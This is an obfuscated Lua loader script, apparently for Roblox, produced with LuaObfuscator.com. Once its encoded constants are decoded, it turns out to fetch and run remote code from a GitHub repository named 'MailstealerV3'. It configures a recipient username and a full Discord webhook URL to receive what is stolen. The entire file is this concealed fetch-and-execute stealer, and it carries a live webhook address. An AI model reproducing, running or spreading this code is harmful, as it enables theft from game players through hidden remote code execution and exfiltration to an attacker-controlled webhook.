--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v76=v5(v68,v19);v19=nil;return v76;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(878 -(282 + 595))) -(v32-(1 -0))) + (2 -(1638 -(1523 + 114))))) ;return v69-(v69%(620 -(555 + 64))) ;else local v70=(837 + 94) -(857 + 74) ;local v71;while true do if (v70==(568 -(367 + 201))) then v71=((1323 -394) -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v71 + v71))>=v71) and 1) or (0 + (1065 -(68 + 997))) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==((2 -1) + 0)) then return (v41 * ((12339544 + 4438629) -(892 + 65))) + (v40 * (156337 -90801)) + (v39 * (472 -216)) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (184 -(67 + 113)) ;v37=1 + 0 ;end end end local function v24()local v42=v23();local v43=v23();local v44=3 -2 ;local v45=(v20(v43,953 -(802 + 150) ,76 -56 ) * ((5 -3)^((21 + 36) -(910 -(261 + 624))))) + v42 ;local v46=v20(v43,(28 -12) + (1085 -(1020 + 60)) ,54 -23 );local v47=((v20(v43,(1893 -(630 + 793)) -(145 + 293) )==(998 -(915 + 82))) and  -(1487 -(998 + 488))) or ((6 -4) -1) ;if (v46==(0 + 0)) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else local v77=0;while true do if (v77==(1187 -(1069 + 118))) then v46=2 -1 ;v44=0 -0 ;break;end end end elseif (v46==(356 + 1691)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/((0 -0) -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1882 -(321 + 493 + 45)) ) * (v44 + (v45/((793 -(368 + 423))^(163 -111)))) ;end local function v25(v48)local v49;if  not v48 then local v72=(0 + 0) -0 ;while true do if (v72==(1747 -(760 + 987))) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1914 -(1789 + 124)) );v18=v18 + v48 ;local v50={};for v65=767 -(745 + 21) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=1002 -(923 + 79) ;local v52;local v53;local v54;local v55;local v56;local v57;while true do local v67=0;while true do if (v67==0) then if (v51==3) then local v95=0;local v96;while true do if (v95==0) then v96=0;while true do if (v96==(1636 -(1373 + 263))) then local v125=0;while true do if (v125==(1000 -(451 + 549))) then for v149=1,v23() do v53[v149-(1 + 0) ]=v28();end return v55;end end end end break;end end end if (v51~=(1 -0)) then else local v97=0;local v98;while true do if (0==v97) then v98=0 -0 ;while true do if (v98~=(1385 -(746 + 638))) then else v57={};v51=1 + 1 ;break;end if ((0 -0)~=v98) then else v55={v52,v53,nil,v54};v56=v23();v98=1 + 0 ;end end break;end end end v67=1;end if (v67==(1 + 0)) then if (2~=v51) then else local v99=560 -(306 + 254) ;while true do if ((1 + 0)==v99) then for v107=1,v23() do local v108=0 -0 ;local v109;local v110;local v111;while true do if (0==v108) then v109=0;v110=nil;v108=1468 -(899 + 568) ;end if (v108~=1) then else v111=nil;while true do if (v109~=1) then else while true do if (0==v110) then v111=v21();if (v20(v111,1 + 0 ,1)~=0) then else local v196=0;local v197;local v198;local v199;local v200;local v201;local v202;while true do if (v196~=3) then else while true do if (v197==1) then v200=nil;v201=nil;v197=2;end if (v197~=(4 -2)) then else v202=nil;while true do if (v198~=(603 -(268 + 335))) then else local v204=290 -(60 + 230) ;while true do if (v204==(573 -(426 + 146))) then v198=1;break;end if (0~=v204) then else v199=0 + 0 ;v200=nil;v204=1457 -(282 + 1174) ;end end end if (v198~=1) then else local v205=0;while true do if (v205~=(812 -(569 + 242))) then else v198=2;break;end if (v205~=0) then else local v206=0 -0 ;while true do if ((1 + 0)==v206) then v205=1;break;end if (v206==(1024 -(706 + 318))) then v201=nil;v202=nil;v206=1252 -(721 + 530) ;end end end end end if (2==v198) then while true do if (v199~=(1271 -(945 + 326))) then else local v207=0;local v208;while true do if (v207==(0 -0)) then v208=0 + 0 ;while true do if ((700 -(271 + 429))==v208) then local v216=0;while true do if (v216~=1) then else v208=1;break;end if (v216==(0 + 0)) then v200=v20(v111,2,3);v201=v20(v111,4,1506 -(1408 + 92) );v216=1;end end end if (v208==1) then v199=1;break;end end break;end end end if (v199~=3) then else if (v20(v201,3,3)~=1) then else v202[1090 -(461 + 625) ]=v57[v202[4]];end v52[v107]=v202;break;end if (v199~=(1290 -(993 + 295))) then else local v210=0;local v211;while true do if (v210==0) then v211=0;while true do if (v211==(0 + 0)) then local v217=1171 -(418 + 753) ;while true do if (v217~=(0 + 0)) then else if (v20(v201,1 + 0 ,1 + 0 )~=(1 + 0)) then else v202[531 -(406 + 123) ]=v57[v202[2]];end if (v20(v201,2,2)==(1770 -(1749 + 20))) then v202[1 + 2 ]=v57[v202[1325 -(1249 + 73) ]];end v217=1 + 0 ;end if (v217~=1) then else v211=1146 -(466 + 679) ;break;end end end if ((2 -1)==v211) then v199=8 -5 ;break;end end break;end end end if (v199~=1) then else local v212=1900 -(106 + 1794) ;local v213;while true do if (v212~=0) then else v213=0;while true do if (v213~=(1 + 0)) then else v199=2;break;end if (v213~=(0 + 0)) then else v202={v22(),v22(),nil,nil};if (v200==0) then local v218=0 -0 ;local v219;local v220;while true do if (0==v218) then v219=114 -(4 + 110) ;v220=nil;v218=585 -(57 + 527) ;end if (v218~=(1428 -(41 + 1386))) then else while true do if (v219~=(103 -(17 + 86))) then else v220=0;while true do if (v220~=(0 + 0)) then else v202[3]=v22();v202[4]=v22();break;end end break;end end break;end end elseif (v200==1) then v202[6 -3 ]=v23();elseif (v200==(5 -3)) then v202[3]=v23() -((168 -(122 + 44))^(27 -11)) ;elseif (v200==(9 -6)) then local v227=0 + 0 ;local v228;local v229;local v230;while true do if (v227==1) then v230=nil;while true do if ((1 + 0)~=v228) then else while true do if ((0 -0)~=v229) then else v230=65 -(30 + 35) ;while true do if (v230~=0) then else v202[3]=v23() -((2 + 0)^(1273 -(1043 + 214))) ;v202[4]=v22();break;end end break;end end break;end if (v228==(0 -0)) then v229=0;v230=nil;v228=1;end end break;end if (v227~=(1212 -(323 + 889))) then else v228=0;v229=nil;v227=2 -1 ;end end end v213=1;end end break;end end end end break;end end break;end if (v197==(580 -(361 + 219))) then local v203=320 -(53 + 267) ;while true do if ((0 + 0)~=v203) then else v198=0;v199=nil;v203=1;end if (v203~=(414 -(15 + 398))) then else v197=1;break;end end end end break;end if (v196~=(982 -(18 + 964))) then else v197=0;v198=nil;v196=3 -2 ;end if (1~=v196) then else v199=nil;v200=nil;v196=2;end if ((2 + 0)==v196) then v201=nil;v202=nil;v196=3;end end end break;end end break;end if (v109~=0) then else local v151=0 + 0 ;while true do if (v151==1) then v109=1;break;end if (v151~=0) then else v110=0;v111=nil;v151=1;end end end end break;end end end v51=3;break;end if (v99==(850 -(20 + 830))) then for v112=1 + 0 ,v56 do local v113=126 -(116 + 10) ;local v114;local v115;while true do if (v113==1) then if (v114==1) then v115=v21()~=(0 + 0) ;elseif (v114==2) then v115=v24();elseif (v114~=(741 -(542 + 196))) then else v115=v25();end v57[v112]=v115;break;end if (v113==(0 -0)) then local v127=0 + 0 ;while true do if (v127~=(0 + 0)) then else v114=v21();v115=nil;v127=1;end if (v127==1) then v113=1 + 0 ;break;end end end end end v55[3]=v21();v99=1;end end end if (v51~=(0 -0)) then else local v100=0 -0 ;local v101;while true do if (v100~=(1551 -(1126 + 425))) then else v101=0;while true do if (0~=v101) then else v52={};v53={};v101=406 -(118 + 287) ;end if (1==v101) then v54={};v51=3 -2 ;break;end end break;end end end break;end end end end local function v29(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end if (1==v61) then v64=v58[3];return function(...)local v78=v62;local v79=v63;local v80=v64;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=5) then if (v91<=2) then if (v91<=0) then v60[v90[3]]=v88[v90[2]];elseif (v91>1) then v88[v90[2]]=v90[3]~=0 ;elseif ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v60;else v88[v90[2]]=v60[v90[3]];end elseif (v91<=3) then v88[v90[2]]=v90[3];elseif (v91==4) then v88[v90[2]]();else do return;end end elseif (v91<=8) then if (v91<=6) then local v120=v90[2];local v121=v88[v90[3]];v88[v120 + 1 ]=v121;v88[v120]=v121[v90[4]];elseif (v91>7) then v82=v90[3];else local v130=0;local v131;while true do if (v130==0) then v131=v90[2];v88[v131]=v88[v131](v13(v88,v131 + 1 ,v83));break;end end end elseif (v91<=10) then if (v91>9) then local v132=0;while true do if (0==v132) then v60[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v132=1;end if (v132==1) then v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v132=2;end if (v132==3) then v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v132=4;end if (2==v132) then v60[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v132=3;end if (v132==4) then v82=v90[3];break;end end elseif (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91==11) then local v133=v90[2];local v134,v135=v81(v88[v133](v13(v88,v133 + 1 ,v90[3])));v83=(v135 + v133) -1 ;local v136=0;for v143=v133,v83 do local v144=0;while true do if (v144==0) then v136=v136 + 1 ;v88[v143]=v134[v136];break;end end end else local v137=0;local v138;local v139;local v140;local v141;local v142;while true do if (v137==0) then v138=nil;v139,v140=nil;v141=nil;v142=nil;v60[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v137=1;end if (v137==4) then v83=(v140 + v142) -1 ;v138=0;for v187=v142,v83 do v138=v138 + 1 ;v88[v187]=v139[v138];end v82=v82 + 1 ;v90=v78[v82];v142=v90[2];v137=5;end if (v137==6) then v82=v90[3];break;end if (v137==5) then v88[v142]=v88[v142](v13(v88,v142 + 1 ,v83));v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]();v82=v82 + 1 ;v90=v78[v82];v137=6;end if (v137==3) then v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v142=v90[2];v139,v140=v81(v88[v142](v13(v88,v142 + 1 ,v90[3])));v137=4;end if (v137==1) then v90=v78[v82];if ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v60;else v88[v90[2]]=v60[v90[3]];end v82=v82 + 1 ;v90=v78[v82];if ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v60;else v88[v90[2]]=v60[v90[3]];end v82=v82 + 1 ;v137=2;end if (v137==2) then v90=v78[v82];v142=v90[2];v141=v88[v90[3]];v88[v142 + 1 ]=v141;v88[v142]=v141[v90[4]];v82=v82 + 1 ;v137=3;end end end v82=v82 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C657256332F6D61696E2F6D61696E03083O00557365726E616D6503113O00556365744A656E4B76756C695368696E7903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31393836382O33382O3732393239333537342F563867767A7768504D757937305F34323573444A373074763634773347464A57443179584D346741635F6748656648764348724939382O75437437544F52436A6773783900163O0012033O00013O0026093O000D000100020004083O000D00012O0002000100013O00120C000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O001500010026093O0001000100010004083O00010001001203000100093O00120A000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00053O00017O00",v9(),...);
